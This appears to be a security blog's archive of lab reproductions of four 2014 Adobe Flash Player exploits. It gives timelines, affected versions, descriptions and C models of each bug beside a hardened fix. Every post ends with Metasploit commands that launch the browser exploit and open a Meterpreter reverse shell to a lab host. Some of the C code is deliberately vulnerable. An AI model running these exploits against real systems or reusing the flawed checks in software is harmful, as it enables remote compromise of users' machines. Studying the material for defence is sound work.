Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2014-8440 Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory

Timeline :

Vulnerability discovered by bilou and reported to Verisign’s iDefense VCP
Vulnerability reported to the vendor by Verisign’s iDefense VCP on 2014-09-03
Patched by the vendor via APSB14-24 on 2014-11-11
Vulnerability reported as integrated into exploit kits on 2014-11-20
Metasploit PoC provided on 2015-04-30

PoC provided by :

Nicolas Joly (bilou ?)
Unknown
juan vazquez

Reference(s) :

CVE-2014-8440
APSB14-24

Affected version(s) :

Adobe Flash Player 15.0.0.189 and earlier versions
Adobe Flash Player 13.0.0.250 and earlier 13.x versions
Adobe Flash Player 11.2.202.411 and earlier versions for Linux
Adobe AIR desktop runtime 15.0.0.293 and earlier versions
Adobe AIR SDK 15.0.0.302 and earlier versions
Adobe AIR SDK & Compiler 15.0.0.302 and earlier versions
Adobe AIR 15.0.0.293 and earlier versions for Android

Tested on :

with Adobe Flash Player 15.0.0.189 and Internet Explorer 11 on Windows 7 SP1

Description :

This module exploits an uninitialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails to initialize allocated memory. With a suitable memory layout this leads to a ByteArray object corruption, which can be abused to read and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE 11 with Flash 15.0.0.189.
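As an added illustration of the bug class (this is not Flash's code, Adobe's patch or the Metasploit module), the C below models a decompress routine that sizes its output buffer from the stream's claimed length, never looks at how much the decompressor actually produced, and publishes the claimed length as the ByteArray length; a hardened form sits beside it. The toy run-length format, the fixed arena standing in for the heap and the stale byte pattern are assumptions made so the leak is deterministic; with real zlib the unwritten tail simply holds whatever the chunk's previous owner left there.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint8_t *buf; size_t length; } ByteArray;

/* Stand-in heap (assumption for the demo): one fixed arena pre-filled with a
 * "stale" pattern that plays the role of data a previous owner left behind. */
static uint8_t arena[64];
static const uint8_t STALE[4] = { 0xDE, 0xAD, 0xBE, 0xEF };

void arena_reset(void)
{
    for (size_t i = 0; i < sizeof arena; i++) arena[i] = STALE[i % 4];
}

static uint8_t *arena_alloc(size_t n)          /* like malloc: no clearing */
{
    return n <= sizeof arena ? arena : NULL;
}

/* Toy compressed format standing in for zlib (assumption, not Flash's format):
 * 4-byte little-endian claimed output length, then (count, value) run pairs.
 * Decoding stops when the input runs out, which is how a truncated or corrupt
 * zlib stream makes inflate() return before the output buffer is full. */
static size_t toy_claimed_len(const uint8_t *in, size_t in_len)
{
    if (in_len < 4) return 0;
    return (size_t)in[0] | ((size_t)in[1] << 8) | ((size_t)in[2] << 16) | ((size_t)in[3] << 24);
}

static size_t toy_inflate(const uint8_t *in, size_t in_len, uint8_t *out, size_t out_cap)
{
    size_t produced = 0;
    for (size_t i = 4; i + 1 < in_len && produced < out_cap; i += 2) {
        uint8_t count = in[i], value = in[i + 1];
        while (count > 0 && produced < out_cap) { out[produced++] = value; count--; }
    }
    return produced;                            /* bytes actually written */
}

/* Vulnerable pattern: trust the claimed length for both the allocation and
 * the published length, ignore the decompressor's result. The tail of the
 * ByteArray is then memory this code never initialized. */
int uncompress_vulnerable(ByteArray *ba, const uint8_t *in, size_t in_len)
{
    size_t claimed = toy_claimed_len(in, in_len);
    uint8_t *out = arena_alloc(claimed);
    if (out == NULL) return -1;
    (void)toy_inflate(in, in_len, out, claimed);   /* result ignored: the bug */
    ba->buf = out;
    ba->length = claimed;                          /* covers bytes never written */
    return 0;
}

/* One hardening (not necessarily Adobe's fix): a short output is a failure,
 * the allocation is wiped, and the ByteArray stays empty. */
int uncompress_fixed(ByteArray *ba, const uint8_t *in, size_t in_len)
{
    size_t claimed = toy_claimed_len(in, in_len);
    uint8_t *out = arena_alloc(claimed);
    if (out == NULL) return -1;
    if (toy_inflate(in, in_len, out, claimed) != claimed) {
        memset(out, 0, claimed);
        ba->buf = NULL;
        ba->length = 0;
        return -1;
    }
    ba->buf = out;
    ba->length = claimed;
    return 0;
}

/* Constructed sample stream: claims 16 output bytes but only carries two runs
 * (4 x 'A', 4 x 'B'), so the last 8 bytes are never written. */
const uint8_t TRUNCATED_STREAM[] = { 16, 0, 0, 0, 4, 'A', 4, 'B' };

/* Bytes of the ByteArray still holding the arena's stale pattern, i.e. how
 * much uninitialized memory script can now read or corrupt (buf starts at
 * arena offset 0, so the pattern index is just i % 4). */
size_t stale_bytes(const ByteArray *ba)
{
    size_t n = 0;
    for (size_t i = 0; i < ba->length; i++)
        if (ba->buf[i] == STALE[i % 4]) n++;
    return n;
}

typedef int (*uncompress_fn)(ByteArray *, const uint8_t *, size_t);

int status_after(uncompress_fn f)
{
    ByteArray ba = { NULL, 0 };
    arena_reset();
    return f(&ba, TRUNCATED_STREAM, sizeof TRUNCATED_STREAM);
}

size_t stale_after(uncompress_fn f)
{
    ByteArray ba = { NULL, 0 };
    arena_reset();
    (void)f(&ba, TRUNCATED_STREAM, sizeof TRUNCATED_STREAM);
    return stale_bytes(&ba);
}

int main(void)
{
    printf("vulnerable: rc=%d stale=%zu\n", status_after(uncompress_vulnerable), stale_after(uncompress_vulnerable));
    printf("fixed:      rc=%d stale=%zu\n", status_after(uncompress_fixed), stale_after(uncompress_fixed));
    return 0;
}
```

The vulnerable path reports success and hands script a 16-byte ByteArray whose last 8 bytes are the allocator's leftovers; the hardened path fails closed. In the real bug those leftovers are heap metadata or neighbouring objects, which is what makes the corruption controllable once the heap layout is groomed.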

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2014-09-10
Patched by the vendor via APSB14-22 on 2014-10-14
Vulnerability reported as integrated into exploit kits on 2014-10-21
Metasploit PoC provided on 2015-04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is set up as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0556 Adobe Flash Player copyPixelsToByteArray Method Integer Overflow

Timeline :

Vulnerability discovered by Chris Evans of Google's Project Zero team in 2014-07
Patched by the vendor via APSB14-21 on 2014-09-09
First public PoC provided by hdarwin on Packet Storm on 2014-09-30
Vulnerability reported as integrated into exploit kits on 2014-10-20
Metasploit PoC provided on 2015-04-15

PoC provided by :

Chris Evans
Nicolas Joly
hdarwin
juan vazquez

Reference(s) :

CVE-2014-0556
APSB14-21

Affected version(s) :

Adobe Flash Player 14.0.0.179 and earlier versions

Tested on :

with Adobe Flash Player 14.0.0.176 (flashplayer14_0r0_176_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method of the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents outside the ByteArray buffer. This module has been tested successfully on:

Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179
Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179
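The casi32 bug above (CVE-2014-0569) and this copyPixelsToByteArray bug are the same mistake seen from two sides: a bounds check on 32-bit unsigned values that wraps around. With a length-0 domainMemory, `length - 4` underflows and every address passes; with a destination position close to 2^32, `position + size` overflows to a small number and the write lands far past the buffer. The C below, added here as an example and not Flash's or the Metasploit module's code, puts each buggy check beside a hardened form and gates a model of each operation with them. The ByteArray layout, the `cap` argument and the `oob` reporting (so the demo never actually writes out of bounds) are assumptions; growth of the destination ByteArray on a large but non-wrapping end offset is left out of the model.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Model of an AVM2 ByteArray: 32-bit length and position, like the runtime's. */
typedef struct { uint8_t *buf; uint32_t length; uint32_t position; } ByteArray;

/* ---- casi32 on domainMemory ------------------------------------------- */

/* Buggy range check: `len - 4` wraps to 0xFFFFFFFC when len is 0 (the empty
 * ByteArray set as domainMemory), so every address passes. */
bool casi32_addr_ok_vulnerable(uint32_t len, uint32_t addr)
{
    return addr <= len - 4;
}

/* Hardened check: test the length before subtracting from it. */
bool casi32_addr_ok_fixed(uint32_t len, uint32_t addr)
{
    return len >= 4 && addr <= len - 4;
}

/* Compare-and-swap of the int32 at addr, gated by the chosen check. If the
 * check passes but the access leaves the cap bytes of real backing store,
 * *oob is set instead of corrupting memory. Returns the previous value. */
int32_t casi32(ByteArray *mem, uint32_t cap, uint32_t addr, int32_t expected, int32_t newval,
               bool (*addr_ok)(uint32_t, uint32_t), bool *oob)
{
    *oob = false;
    if (!addr_ok(mem->length, addr)) return 0;        /* AVM2 raises RangeError here */
    if (addr > cap || cap - addr < 4) { *oob = true; return 0; }
    int32_t cur;
    memcpy(&cur, mem->buf + addr, 4);
    if (cur == expected) memcpy(mem->buf + addr, &newval, 4);
    return cur;
}

/* ---- copyPixelsToByteArray -------------------------------------------- */

/* Buggy destination check: position + nbytes wraps modulo 2^32, so a huge
 * position yields a small end, no growth is triggered, and the copy starts
 * at position anyway. */
bool copy_dest_ok_vulnerable(uint32_t len, uint32_t position, uint32_t nbytes)
{
    uint32_t end = position + nbytes;
    return end <= len;
}

/* Hardened check: compare against the remaining room, which cannot wrap. */
bool copy_dest_ok_fixed(uint32_t len, uint32_t position, uint32_t nbytes)
{
    return position <= len && nbytes <= len - position;
}

/* Copy a w*h block of 32-bit pixels to dst->position. Same oob convention as
 * casi32(). Returns bytes copied. */
uint32_t copy_pixels_to_bytearray(ByteArray *dst, uint32_t cap, const uint32_t *pixels,
                                  uint32_t w, uint32_t h,
                                  bool (*dest_ok)(uint32_t, uint32_t, uint32_t), bool *oob)
{
    uint32_t nbytes = w * h * 4;                      /* small here; the bug is in position */
    *oob = false;
    if (!dest_ok(dst->length, dst->position, nbytes)) return 0;
    if (dst->position > cap || cap - dst->position < nbytes) { *oob = true; return 0; }
    memcpy(dst->buf + dst->position, pixels, nbytes);
    dst->position += nbytes;
    return nbytes;
}

/* Constructed 2x2 bitmap used by the scenarios below. */
static const uint32_t PIXELS[4] = { 0x00112233, 0x00445566, 0x00778899, 0x00AABBCC };

/* Scenario: length-0 domainMemory, casi32 at a far address. True = OOB access let through. */
bool demo_casi32_empty_domain_memory(bool (*addr_ok)(uint32_t, uint32_t))
{
    uint8_t store[16] = { 0 };
    ByteArray mem = { store, 0, 0 };
    bool oob;
    casi32(&mem, sizeof store, 0x1000, 0, 0x41414141, addr_ok, &oob);
    return oob;
}

/* Scenario: 16-byte destination with position 0xFFFFFFF0. True = OOB write let through. */
bool demo_copy_pixels_huge_position(bool (*dest_ok)(uint32_t, uint32_t, uint32_t))
{
    uint8_t store[16] = { 0 };
    ByteArray dst = { store, sizeof store, 0xFFFFFFF0u };
    bool oob;
    copy_pixels_to_bytearray(&dst, sizeof store, PIXELS, 2, 2, dest_ok, &oob);
    return oob;
}

/* Benign path through the hardened checks: copy the bitmap, then CAS dword 0. */
int32_t demo_benign(void)
{
    uint8_t store[16] = { 0 };
    ByteArray ba = { store, sizeof store, 0 };
    bool oob;
    copy_pixels_to_bytearray(&ba, sizeof store, PIXELS, 2, 2, copy_dest_ok_fixed, &oob);
    return casi32(&ba, sizeof store, 0, 0x00112233, 0, casi32_addr_ok_fixed, &oob);
}

int main(void)
{
    printf("casi32 len=0: vulnerable oob=%d fixed oob=%d\n",
           demo_casi32_empty_domain_memory(casi32_addr_ok_vulnerable),
           demo_casi32_empty_domain_memory(casi32_addr_ok_fixed));
    printf("copyPixels pos=0xFFFFFFF0: vulnerable oob=%d fixed oob=%d\n",
           demo_copy_pixels_huge_position(copy_dest_ok_vulnerable),
           demo_copy_pixels_huge_position(copy_dest_ok_fixed));
    printf("benign CAS read: 0x%08x\n", (unsigned)demo_benign());
    return 0;
}
```

The two hardened checks share one rule: never compute `a - b` or `a + b` on untrusted 32-bit sizes and then compare the result; compare the operands against the remaining room instead. Both Metasploit modules above turn the out-of-bounds access these checks fail to stop into a corrupted ByteArray length, which is the read/write primitive the rest of the exploit builds on.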

Commands :

use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2014-0515 Adobe Flash Player Shader Buffer Overflow

Timeline :

Vulnerability discovered being exploited in the wild by Kaspersky Lab on 2014-04-14
Patched by the vendor via APSB14-13 on 2014-04-28
Windows Metasploit PoC provided on 2014-05-08
Vulnerability reported as integrated into exploit kits on 2014-06-07
Multi-platform Metasploit PoC provided on 2015-06-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2014-0515
BID-67092
APSB14-13

Affected version(s) :

Adobe Flash Player 13.0.0.182 and earlier versions for Windows
Adobe Flash Player 13.0.0.201 and earlier versions for Macintosh
Adobe Flash Player 11.2.202.350 and earlier versions for Linux

Tested on :

with Adobe Flash Player 13.0.0.182 (flashplayer13_0r0_182_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions:

Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182
Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182
Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182
Linux Mint “Rebecca” (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350

Commands :

use exploit/multi/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo